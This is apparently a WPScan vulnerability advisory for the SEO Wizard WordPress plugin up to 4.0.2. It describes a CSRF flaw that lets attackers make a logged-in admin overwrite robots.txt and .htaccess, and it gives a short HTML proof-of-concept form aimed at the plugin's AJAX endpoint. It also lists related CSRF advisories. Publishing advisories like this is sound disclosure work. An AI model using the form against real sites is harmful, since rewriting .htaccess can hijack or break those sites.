SEO Wizard <= 4.0.2 – Unauthorised robots.txt & .htaccess Edit via CSRF | Plugin Vulnerabilities

Description

The plugin does not properly check for CSRF in its wsw_edit_htaccess_file, wsw_create_robots_text and wsw_update_content_robots AJAX actions, allowing attackers to make logged in admin write arbitrary data to the robots.txt and .htaccess files

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wsw_edit_htaccess_file" />
      <input type="hidden" name="content" value="Yolo" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

786a4300-c884-4144-92d3-976459b94271

Timeline

Publicly Published

2021-06-30 (about 4 years ago)

Added

2021-06-30 (about 4 years ago)

Last Updated

2021-06-30 (about 4 years ago)

Other

Published

Title

Published

2024-01-26

Title

Travelpayouts < 1.1.13 - Settings Update via CSRF

Published

2023-11-02

Title

video carousel slider with lightbox 1.0 - Cross-Site Request Forgery

Published

2023-10-19

Title

Delete Usermetas < 1.2.0 - Cross-Site Request Forgery

Published

2023-11-14

Title

Hreflang Manager < 1.07 - Cross-Site Request Forgery

Published

2025-09-09

Title

Mow < 4.11 - Cross-Site Request Forgery